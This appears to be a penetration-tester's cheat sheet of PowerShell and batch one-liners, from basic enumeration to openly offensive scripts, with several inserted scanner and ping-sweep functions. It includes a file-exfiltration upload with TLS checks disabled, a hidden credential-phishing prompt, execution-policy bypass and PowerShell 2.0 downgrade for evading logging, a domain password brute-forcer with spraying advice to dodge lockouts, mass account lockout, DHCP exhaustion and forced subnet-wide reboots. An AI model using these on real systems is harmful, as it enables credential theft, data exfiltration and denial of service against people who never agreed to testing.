Table Of Contents
- Windows Scripting
- PowerShell Scripting
- Powershell Basics
- Powershell OneLiners
- Windows Batch Scripting
- Batch Scripts
Windows Scripting
- Note: This section collects PowerShell and batch script examples. Some only enumerate system information; others change system state (reboots, address changes, account lockouts) or aid in discovering sensitive information.
POWERSHELL BASICS
Stops recording the session transcript (started with Start-Transcript)
Stop-Transcript
Displays file contents
Get-Content <FILE_PATH>
Shows usage examples for <COMMAND>
Get-Help <COMMAND> -Examples
Searches available cmdlets, functions and executables for a string
Get-Command *<STRING_TO_SEARCH>*
Displays services (Stop-Service / Start-Service control them)
Get-Service
Displays services via WMI; unlike Get-Service it accepts -Credential (with -ComputerName) and exposes the binary path (PathName) and service account (StartName)
Get-WmiObject -Class win32_service
Display PowerShell version
$psVersionTable
Run the PowerShell 2.0 engine from a newer version (requires the optional Windows PowerShell 2.0 Engine feature and .NET 3.5; the 2.0 engine has no script block logging or AMSI, so its use is worth alerting on)
powershell -version 2.0
Returns the number of services
Get-Service | measure-object
Displays drives in the current session
get-psdrive
Returns only process names
Get-Process | select -expandproperty name
Cmdlets that accept a -Credential parameter
get-help * -parameter credential
Available WMI classes whose names contain "network"
get-wmiobject -list *network
DNS lookup (forward for a hostname, reverse for an IP address)
[Net.DNS]::GetHostEntry("<IP_ADDRESS>")
POWERSHELL ONELINERS
Launch a script file with PowerShell, bypassing the execution policy and skipping profiles
powershell -ep bypass -nop -File <FILE_PATH>
TCP port connection (scanner) -- replace the <PORT>s with the ports to scan and <IP_ADDRESS> with the target. A port that drops the SYN makes the constructor block until the OS connect timeout expires.
$ports=(<PORT>,<PORT>,<PORT>);$ip="<IP_ADDRESS>";foreach ($port in $ports){$socket=$null;try{$socket=New-Object System.Net.Sockets.TcpClient($ip,$port)}catch{};if ($null -eq $socket){"${ip}:${port} - Closed"}else{"${ip}:${port} - Open";$socket.Close();$socket=$null}}
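The one-liner above has no connect timeout, so every filtered port costs the full OS connect timeout (around 20 seconds). The following function is an added example, not code from the original page: it uses TcpClient.ConnectAsync with a bounded wait so that open, closed and filtered ports are told apart quickly. The target, port list and the 500 ms default are placeholders and assumptions to be adjusted for the network being tested.

```powershell
# Added example (not from the original page): TCP connect scan with a per-port timeout.
# The target address and port list below are placeholders; TimeoutMs is an assumed default.
function Test-TcpPorts {
    param(
        [Parameter(Mandatory)][string]$Target,
        [Parameter(Mandatory)][int[]]$Ports,
        [int]$TimeoutMs = 500
    )
    foreach ($port in $Ports) {
        $client = New-Object System.Net.Sockets.TcpClient
        try {
            # ConnectAsync lets the wait be bounded; the synchronous constructor used in the
            # one-liner blocks for the full OS connect timeout on a port that drops the SYN.
            $task = $client.ConnectAsync($Target, $port)
            $finished = $task.Wait($TimeoutMs)
            if ($finished -and $client.Connected) {
                $state = 'Open'          # SYN/ACK received
            } elseif (-not $finished) {
                $state = 'Filtered'      # neither SYN/ACK nor RST inside the timeout
            } else {
                $state = 'Closed'
            }
        } catch {
            # Task.Wait wraps the SocketException (connection refused => RST) in an AggregateException
            $state = 'Closed'
        } finally {
            $client.Close()
        }
        [pscustomobject]@{ Target = $Target; Port = $port; State = $state }
    }
}

# Usage (placeholders): scan a handful of common ports and show only the open ones
Test-TcpPorts -Target '<IP_ADDRESS>' -Ports 22,80,443,445,3389 -TimeoutMs 500 |
    Where-Object { $_.State -eq 'Open' }
```

Emitting objects rather than strings lets the result be filtered, sorted or exported with Export-Csv like any other cmdlet output; the 'Filtered' state is the one the original one-liner cannot report.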
Ping with a 500 millisecond timeout (returns a PingReply; check its Status property)
$ping = New-Object System.Net.Networkinformation.ping;$ping.Send("<IP_ADDRESS>",500)
Credential prompt popup (returns a PSCredential object; the title and message are attacker-controlled, which is what makes this usable as a credential-phishing pretext)
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$Host.UI.PromptForCredential('<WINDOW_TITLE>','<MESSAGE>','<USERNAME>','<DOMAIN>')"
Run FILE every 4 hours between Aug 8-11, 2022 during 0800-1759 (from cmd.exe). The .NET date format is case-sensitive: yyyyMMdd-HHmm, where MM is the month and mm the minute. The else branch sleeps so the loop does not spin the CPU outside the window.
powershell -Command "do {if ((Get-Date -Format yyyyMMdd-HHmm) -match '202208(0[8-9]|1[0-1])-(0[8-9]|1[0-7])[0-5][0-9]'){Start-Process -WindowStyle Hidden '<FILE_PATH>';Start-Sleep -s 14400} else {Start-Sleep -s 60}}while(1)"
PowerShell runas (start a PowerShell as another user, which then launches FILE elevated via the UAC prompt)
$pw = ConvertTo-SecureString -String "<PASSWORD>" -AsPlainText -Force;
$pp = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "<DOMAIN>\<USERNAME>", $pw;
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process <FILE_PATH> -Verb RunAs}'
Email sender (Microsoft marks Send-MailMessage obsolete because it cannot guarantee a secure connection; keep -UseSsl and pass a PSCredential object rather than a plaintext password)
Send-MailMessage -To "<EMAIL>" -From "<EMAIL>" -Subject "<SUBJECT>" -Attachments "<FILE_ATTACHMENT>" -Body "<BODY>" -SmtpServer "<IP_ADDRESS>" -Port <PORT> -Credential <PS_CRED_OBJECT> -UseSsl
PowerShell file download from a specified URL. From cmd.exe the outer quotes must be double quotes; a single-quoted -Command value is passed through as a string literal and echoed instead of executed.
powershell -NoProfile -NonInteractive -Command "Invoke-WebRequest -Uri 'https://<URL>' -OutFile '<FILE_PATH>'"
PowerShell data exfil
# Sends the file at $filepath to $server with an HTTP POST (multipart upload). A web server must be listening on the host and port named in $server. The ServerCertificateValidationCallback line disables TLS certificate validation for the process, so the upload also works against an https listener with a self-signed certificate.
powershell -NoProfile -NonInteractive -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $server='http://<URL>'; $filepath='<FILE_PATH>'; $http = New-Object System.Net.WebClient; $response = $http.UploadFile($server,$filepath)"
Export OS info (all Win32_OperatingSystem properties) into a CSV file
Get-WmiObject -class win32_operatingsystem | select -property * | export-csv <FILE_PATH>
List running services
Get-Service | where {$_.status -eq "Running"}
PowerShell netstat equivalent (lists active TCP connections only; no owning process is shown)
[System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties().GetActiveTcpConnections()
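The IPGlobalProperties call above cannot tell you which process owns a socket, which is usually the first question during triage. The following function is an added example, not part of the original page: it uses Get-NetTCPConnection (NetTCPIP module, Windows 8 / Server 2012 and later) and joins each endpoint to its owning process by PID. The filter to listeners bound to all interfaces at the end is one illustrative triage view.

```powershell
# Added example (not from the original page): TCP endpoints joined to their owning process.
# Assumes the NetTCPIP module (Windows 8 / Server 2012 and later) is available.
function Get-TcpEndpointsWithProcess {
    param([string[]]$State = @('Listen', 'Established'))

    # Build a PID -> process lookup once instead of calling Get-Process per connection
    $procs = @{}
    Get-Process | ForEach-Object { $procs[$_.Id] = $_ }

    Get-NetTCPConnection | Where-Object { $_.State.ToString() -in $State } | ForEach-Object {
        # OwningProcess is a UInt32; cast so it matches the Int32 keys from Get-Process
        $p = $procs[[int]$_.OwningProcess]
        [pscustomobject]@{
            LocalAddress  = $_.LocalAddress
            LocalPort     = $_.LocalPort
            RemoteAddress = $_.RemoteAddress
            RemotePort    = $_.RemotePort
            State         = $_.State
            PID           = $_.OwningProcess
            Process       = if ($p) { $p.ProcessName } else { '<exited>' }
        }
    }
}

# Triage view: anything listening on all interfaces, sorted by port
Get-TcpEndpointsWithProcess -State Listen |
    Where-Object { $_.LocalAddress -in '0.0.0.0', '::' } |
    Sort-Object LocalPort | Format-Table -AutoSize
```

Run it elevated if you need process names for services running as SYSTEM; otherwise those rows still appear but some process details are unavailable.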
Persistent PSDrive (mapped drive letter I:) to a remote file share; -Persist requires a single-letter name
New-PSDrive -Persist -PSProvider FileSystem -Root \\<IP_ADDRESS>\<SHARE_FOLDER> -Name i
Return .log files last written after 2012-08-20 (change the date as needed; -Force includes hidden files)
Get-ChildItem -Path <FILE_PATH> -Force -Recurse -Filter *.log -ErrorAction SilentlyContinue | where {$_.LastWriteTime -gt "2012-08-20"}
Turn on PowerShell remoting (needs an elevated prompt; starts the WinRM service, creates a listener and opens the firewall exception)
powershell -Command "Enable-PSRemoting -Force"
BATCH SCRIPTS
- Note: In a batch file, for-loop variables are written with two percent signs (%%i); on the interactive command line use one (%i). The ping sweep below is written for the command line; the other loops are written for .bat files.
Nested for loop ping sweep of 10.10.10-254.10-254 (command-line form). Match on "TTL=" rather than "Reply": a "Reply from <self>: Destination host unreachable." line would otherwise count a dead host as live.
for /L %i in (10,1,254) do @(for /L %x in (10,1,254) do @ping -n 1 -w 100 10.10.%i.%x 2>nul | find "TTL=" >nul && echo 10.10.%i.%x >> live.txt)
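The batch sweep pays the 100 ms timeout serially for every dead host, so a /16 takes hours. As an added example, not from the original page, here is a PowerShell sweep of one /24 that sends all echo requests at once with SendPingAsync and reports only hosts that answered. The prefix and timeout are placeholders and assumptions.

```powershell
# Added example (not from the original page): parallel ping sweep of a /24.
# A single Ping object cannot have more than one send in flight, so each host gets its own.
function Invoke-PingSweep {
    param(
        [Parameter(Mandatory)][string]$Prefix,   # first three octets, e.g. '10.10.1' (placeholder)
        [int]$Start = 1,
        [int]$End = 254,
        [int]$TimeoutMs = 300                    # assumed default; raise it for slow links
    )
    $jobs = foreach ($i in $Start..$End) {
        $ip = "$Prefix.$i"
        $pinger = New-Object System.Net.NetworkInformation.Ping
        [pscustomobject]@{ IP = $ip; Task = $pinger.SendPingAsync($ip, $TimeoutMs) }
    }
    # Wait for all replies together instead of one timeout per dead host.
    # A timed-out ping completes with Status TimedOut; only a transport error faults the task.
    try {
        [System.Threading.Tasks.Task]::WaitAll([System.Threading.Tasks.Task[]]$jobs.Task)
    } catch [System.AggregateException] {
        # faulted tasks are skipped below via IsFaulted
    }
    foreach ($job in $jobs) {
        if ($job.Task.IsFaulted) { continue }
        $reply = $job.Task.Result
        # Success is the only "up" signal; unreachable notifications have a different Status
        if ($reply.Status -eq 'Success') {
            [pscustomobject]@{
                IP          = $job.IP
                RoundTripMs = $reply.RoundtripTime
                TTL         = $reply.Options.Ttl
            }
        }
    }
}

# Usage (placeholder prefix): same output the batch loop writes to live.txt, plus RTT and TTL
Invoke-PingSweep -Prefix '10.10.1' | Export-Csv live.csv -NoTypeInformation
```

The TTL column is a cheap OS hint (64 for most Linux hosts, 128 for Windows) that the batch version throws away.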
Loop through each line in a file ("tokens=*" keeps the whole line; for /F skips empty lines and lines starting with ";" by default)
for /F "tokens=*" %%A in (<FILE_PATH>) do echo %%A
Domain brute forcer (one user against every password, then the next user). With an account lockout policy in place this order locks accounts; run one password across all users per round instead, pausing longer than the lockout observation window between rounds. "tokens=*" and the quoted %%P keep passwords containing spaces intact.
for /F "tokens=*" %%N in (users.txt) do for /F "tokens=*" %%P in (passwords.txt) do net use \\<IP_ADDRESS>\IPC$ /user:<DOMAIN>\%%N "%%P" 1>NUL 2>&1 && echo %%N:%%P && net use \\<IP_ADDRESS>\IPC$ /delete > NUL
Account lockout (lockout.bat): one failed logon per user listed in FILE_PATH. A single failure does not lock an account; rerun the script as many times as the domain's lockout threshold.
@echo Test run:
for /F "tokens=*" %%A in (<FILE_PATH>) do net use \\<IP_ADDRESS>\c$ /USER:<DOMAIN>\%%A wrongpass
DHCP exhaustion: cycles this interface through every static address in 10.0.42.2-254, holding each for about 10 seconds. Static assignments consume no leases themselves; the effect comes from DHCP conflict detection seeing the addresses in use, and it produces address conflicts on the subnet. The original "ping 127.0.0.1 -w 10000" delay returned immediately, so timeout is used for the pause.
for /L %%P in (2,1,254) do (netsh interface ip set address name="<INTERFACE_NAME>" static 10.0.42.%%P 255.255.255.0 <GATEWAY_IP> && timeout /t 10 /nobreak > nul)
DNS reverse lookup of 10.1.11.2-254; records only addresses that resolved to a name
for /L %%P in (2,1,254) do (nslookup 10.1.11.%%P 2>nul | findstr /i /c:"Name" >> dns.txt && echo HOST: 10.1.11.%%P >> dns.txt)
Search recursively for files whose names begin with "pass" and print whether each is a directory, its date/time, relative path, full path and size (the @variables are optional)
forfiles /P <FILE_PATH> /S /M pass* /C "cmd /c echo @isdir @fdate @ftime @relpath @path @fsize"
Simulate DNS lookups for malicious domains (useful for testing AV/IDS detection)
:: domains.txt should contain known malicious domains, one per line.
:: To put the queries on the wire without actually resolving a malicious domain, point nslookup at a host that runs no DNS server (for example your own IP) in place of <DNS_SERVER_IP>; the lookups will time out but still be visible to network sensors.
for /F "tokens=*" %%A in (C:\Users\Administrator\Desktop\domains.txt) do nslookup %%A <DNS_SERVER_IP>
Simulated web browsing (simple traffic generation): opens each URL 400 times, leaving the browser up for about 5 seconds per visit
for /L %%P in (1,1,400) do @for %%U in (<URL1> <URL2> <URL3>) do start /b iexplore %%U & ping -n 6 localhost > nul & taskkill /F /IM iexplore.exe > nul
Rolling reboot of 1.1.1.2-254 (replace /r with /s for a shutdown; /f /t 0 forces it immediately with no warning to logged-on users)
for /L %%P in (2,1,254) do shutdown /r /m \\1.1.1.%%P /f /t 0 /c "Reboot message"